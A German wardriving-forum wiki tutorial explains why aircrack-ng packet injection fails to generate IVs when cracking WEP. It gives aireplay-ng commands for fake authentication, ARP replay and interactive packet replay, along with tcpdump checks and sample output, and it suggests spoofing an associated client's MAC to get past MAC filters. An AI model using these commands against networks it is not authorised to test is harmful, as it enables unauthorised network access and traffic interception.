Tcpdump

Aus Wardriving-Forum.de Enzyklopädie

Inhaltsverzeichnis

1 Tutorial: Ich injecte, aber es kommen keine IVs!
2 Einleitung
3 Vorraussetzungen
4 Vorgehensweise
5 Injectionstechniken
6 ARP Request-Replay
7 Replay Previous ARP
8 Die "-p 0841" Technik
9 Die "-p 0841" Technik mit vorhergehenden Daten
10 Packet-Replay von einem angemeldeten Client
- 10.1 Troubleshooting

[Bearbeiten] Tutorial: Ich injecte, aber es kommen keine IVs!

[Bearbeiten] Einleitung

Ein häufiges Problem, dass aufkommt, ist, dass Injectet wird, aber die IV's nicht zunehmen. Mit Hilfe dieses Tutorials könnt ihr die Ursache finden und beheben.

Expertimentiere mit deinem WLAN um dich mit den Ideen und Techniken vertraut zu machen. Wenn du selber keinen AP besitzt, denke bitte daran, eine Erlaubnis des Betreibers des APs zu bekommen um damit zu experimentieren.

Ich will dem Aircrack-ng team für dieses großartige Tool danken! Ich würde mich über Kritik, Lob, Links und weiteres Troubleshooting freuen!

[Bearbeiten] Vorraussetzungen

Zuerst, setzt diese Lösung folgendes Vorraus:

Du benutzt Treiber, die für Injection gepatched sind. Benutze injection test um sicher zu gehen, dass deine Karte injecten kann, bevor du beginnst.
du hast das interface im Monitor Mode, auf dem selben Channel gestartet, auf dem sich der AP befindet. Benutze "iwconfig" um sicher zu gehen, dass das interface, dass du benutzen willst, sich im Monitor Mode befindet, auf dem richtigen channel, richtige Geschwindigkeit etc. Im Monitor Mode ist "Access Point" deine Karten-MAC-Adressed MAC address. MERKE: Nur madwifi-ng treiber zeigen die Karten-MAC in dem AP Feld. Andere Treiebr machen das nicht. Die Ausgebe wird so ähnlich aussehen:

 ath0      IEEE 802.11b  ESSID:""  Nickname:""
           Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:09:5B:EC:EE:F2   
           Bit Rate=2 Mb/s   Tx-Power:15 dBm   Sensitivity=0/3 
           Retry:off   RTS thr:off   Fragment thr:off
           Encryption key:off
           Power Management:off
           Link Quality=0/94  Signal level=-98 dBm  Noise level=-98 dBm
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Du hast airodump auf dem selben channel gestartet, auf dem sich der AP befindet. Nimm die "-c <channel number" Option.
Du bist physikalisch nahe genug an dem AP um Pakete senden und empfangen zu können. Nur weil du Pakete von dem AP enfangen kannst, heißt das nicht, dass du auch Pakete zum AP übertragen kannst. Die WLAN-Karten Stärke ist normalerweise weniger Stark als die des AP's. Also musst du physikalisch nahe genug sein, damit du pakete erreichen und damit der AP die Pakete empfangen kann. Du solltest dich vergewissern, dass du mit dem kommuniziernen kannst, indem du dieser Anleitung folgst.
Die Injection Technick in diesem Tutorial hängen davon ab, dass ein oder mehr datem pakete vorhanden sind. Fals keine Daten Pakete von dem AP oder dem Client kommen, ist es unmöglich den WEP-Key zu knacken. Die Ausnahme ist, eine Wiederverwendung eines, im vorheraus gefangenen, Daten Paketes. Du musst ein oder mehr von diesen Daten Paketen haben um erfolgreich zu sein.
Du benutzt Version 0.9 von aircrack-ng. Wenn du eine Andere Version benutzt, müssen vielleicht einige Befehle angepasst werden.

Stelle sicher, dass alle obengenannten Vorraussetungen erfüllt sind, da sonst die gezeigten Befehle hier in diesem Tutorial nicht funktionieren werden! Du musst "ath0" mit dem Namen deines WLAN-Interfaces ersetzten!

[Bearbeiten] Vorgehensweise

Wenn der Access Point die Pakete, die du sendest, akzeptieren soll, musst du deine MAC-Adresse erst authentifizieren. Sollte die MAC nicht authentifiziert sein, wird der AP die Pakete nicht annehmen und ein Deauthentication-Paket sende. Dies hat auch zur Folge, dass du keine IVs empfangen wirst!

Die fehlende Authentifizierung ist der häufigste Grund, warum die Injection nicht funktioniert. Hier einmal ein typisches Beispiel:

aireplay-ng -3 -b <BSSID MAC Adresse> -h <Quell-MAC Addresse> ath0

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:46:11:19 ath0

Das System antwortet:

 Saving ARP requests in replay_arp-0123-104950.cap
 You should also start airodump-ng to capture replies.
 Notice: got a deauth/disassoc packet. Is the source MAC associated ?
 Notice: got a deauth/disassoc packet. Is the source MAC associated ?
 Read 17915 packets (got 3 ARP requests), sent 5854 packets...

Hast du die "deauth/disassoc" Meldung bemerkt? Diese besagt, dass die Quell-MAC (also deine) nicht am AP angemeldet ist und du darum auch keine IVs bekomst.

Starte:

tcpdump -n -e -s0 -vvv -i ath0

Hier ist eine typische TcpDump-Fehlermeldung:

 11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:46:11:19 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station

Der Access Point (00:14:6c:7e:40:80) sagt der Quell-MAC (00:0f:b5:46:11:19) dass sie nicht assoziiert ist. Wenn du in TCP-Dump nur die Deauth-Pakete sammeln willst, gib folgendes ein: "tcpdump -n -e -s0 -vvv -i ath0 | grep -i DeAuth". Du musst das Wort "DeAuth" anpassen.

So, jetzt kennen wir das Problem. Aber wie lösen wir es?? Es gibt zwei Lösungswege:

 * Assoziiere deine MAC am AP mit aireplay-ng!
 * Benutze eine bereits angemeldete MAC.

\\ Assoziation mit aireplay-ng:

aireplay-ng -1 0 -e <SSID> -a <BSSID MAC Adresse> -h <Quell-MAC Addresse> ath0

aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Der Bildschirm zeigt folgendes:

 18:18:20  Sending Authentication Request
 18:18:20  Authentication successful
 18:18:20  Sending Association Request
 18:18:20  Association successful :-)

Eine andere Variation, falls die erste nicht funktioniert:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0

Aufschlüsselung:

 * 6000 - Reauthentication alle 6000 Sekunden.  Es werden auch automatisch Keep-Alive-Pakete gesendet.
 * -o 1 - Nur ein Paket wird gesendet. Manche APs kommen damit nicht zurecht.
 * -q 10 - Sendet alle 10 Sekunden ein Keep-Alive-Paket

Der Bildschirm zeigt folgendes:

 18:22:32  Sending Authentication Request
 18:22:32  Authentication successful
 18:22:32  Sending Association Request
 18:22:32  Association successful :-)
 18:22:42  Sending keep-alive packet
 18:22:52  Sending keep-alive packet
 # .....

[Bearbeiten] Injectionstechniken

Wenn du erfolgreich mit dem AP assoziiert hast, kannst du gleich die verschiedenen Injectionstechniken ausprobieren.

Bei allen Techniken muss airodump-ng im Hintergrund laufen, damit werden die Datenpakete gesnifft.

[Bearbeiten] ARP Request-Replay

Dies ist die Standart [Request-Replay] Methode.

Diese Attacke erfordert meist einen angemeldeten Client im Netz. Ins seltenen Fällen funktioniert dies aber auch ohne.

[Bearbeiten] Replay Previous ARP

Du kannst einen vorher gesnifften ARP-Request wieder einspeisen. Siehe dazu [[1]] für ein Beispiel.

[Bearbeiten] Die "-p 0841" Technik

Du kannst ein beliebiges ARP-Paket "live" einspeisen. Siehe dazu [[2]] für ein Beispiel.

Es muss ein Client am Netzwerk dazu angemeldet sein!

[Bearbeiten] Die "-p 0841" Technik mit vorhergehenden Daten

Du kannst die "-p 0841" Technik mit dem Einspeisen von bereits gespeicherten ARPs kombinieren. Dazu musst du nur diesen Parameter hinzufügen_ "-r <Dateiname>":

Dies erfordert ein oder mehrere aufgezeichnete Datenpakete.

[Bearbeiten] Packet-Replay von einem angemeldeten Client

Eine weitere Methode ist es, die Pakete von einem angemelden Client abzugreifen. Dies erübrigt die Fake-Authentication.

Dazu benutzen wir die "Interaktive ARP-Replay-Attacke".

Befehl:

 aireplay-ng -2 -a <bssid MAC address> -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -t 1 -f 0 <interface>

Aufschlüsselung:

-d FF:FF:FF:FF:FF:FF - Broadcast - m 68 - minimale Paketlänge von 68 - n 68 - maximale Paketlänge von 68 - t 1 - das Paket ist an den AP gerichtet. - f 0 - Paket kommt nicht vom AP

Diese Eingabe wird jedes erkannte Paket und eine Bestätigungsmeldung anzeigen.

Hier ein Beispiel:

 aireplay-ng -2 -a 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -t 1 -f 0 ath0
 
 Read 202 packets...
 
       Size: 68, FromDS: 0, ToDS: 1 (WEP)
 
            BSSID  =  00:14:6C:7E:40:80
        Dest. MAC  =  FF:FF:FF:FF:FF:FF
       Source MAC  =  00:0F:B5:AB:CB:9D
 
       0x0000:  0841 d400 0014 6c7e 4080 000f b5ab cb9d  .A....l~@.......
       0x0010:  ffff ffff ffff a00f 010a dd00 a795 2871  ..............(q
       0x0020:  59e5 935b b75f bf9d 718b d5d7 919e 2d45  Y..[._..q.....-E
       0x0030:  a89b 22b3 2c70 b3c3 03b0 8481 5787 88ce  ..".,p......W...
       0x0040:  b199 6479                                ..dy
 
 Use this packet ? y
 
 Saving chosen packet in replay_src-0124-120102.cap
 You should also start airodump-ng to capture replies.

Dieses Kommando erstellt IVs. Wie immer läuft daei airodump-ng und mit aircrack-ngwird der Schlüssel berechnet.

[Bearbeiten] Troubleshooting

Es gibt Fälle, in denem man zwar asoziiert ist, aber keine Pakete ankommen. Man muss einfach das Programm neu starten.

Bei einigen Treiber muss die zu injectende MAC-Adresse der MAC der Karte entsprechen. Evtl. muss man dazu seine MAC ändern. Siehe Wie ändere ich die MAC Adresse meiner Karte?

Bei manchen Access Points ist ein MAC-Filter aktiv. Man muss also zum injecten eine bereits angemeldete MAC verwenden.

Um zu überprüfen, ob ein MAC-Filter aktiv ist, muss man folgendes angeben:

 tcpdump -n -vvv -s0 -e -i ath0 

Du musst "00:c0:ca:17:db:6a" zur zu injectenden MAC ändern. Sie ist Groß-KleinSchreibungsabhängig!

Wenn du FakeAuthentication benutzt, sollte der Bildschirm wie folgt aussehen:

 tcpdump -n -e -vvv -r wep.open.system.authentication.cap

Normalerweise solltest du jeweils zwei Pakete sehen. Sollte die Injection mit einem zuvor gespeicherten File fehlschlagen ist ein MAC-Filter aktiv. In diesem Falle musst du deine MAC zur zu injectenden ändern. Dies kannst du mit dem How do I change my card's MAC address? machen.

Eine normale MAC sieht so aus: 00:09:5B:EC:EE:F2. die erste Hälfte (00:09:5B) der MAC ist der sog. "Organizationally Unique Identifier (OUI)". Dies ist der Hersteller der Karte. Die zweite Hälfte (EC:EE:F2) ist der "extension identifier" und ist einzigartig. Viele Accesspoints ignorieren MACs mit falschen OUIs. Stelle also sicher, dass der OUI stimmt! Anderenfalls werden deine Pakete ignoriert. Eine aktuelle Liste kann [[3]] heruntergeladen werden.

Hier ein Beispiel, wie eine fehlgeschlagene Authentifizierung aussieht:

 8:28:02  Sending Authentication Request
 18:28:02  Authentication successful
 18:28:02  Sending Association Request
 18:28:02  Association successful :-)
 18:28:02  Got a deauthentication packet!
 18:28:05  Sending Authentication Request
 18:28:05  Authentication successful
 18:28:05  Sending Association Request
 18:28:10  Sending Authentication Request
 18:28:10  Authentication successful
 18:28:10  Sending Association Request

Achte auf "Got a deauthentication packet" und die weiteren Versuche darüber.

Einige APs haben die Funktion, keine weiteren Clients zuzulassen. Wie man dies bewältigt steht hier: Wie man WEP mittels eines Clients crackt.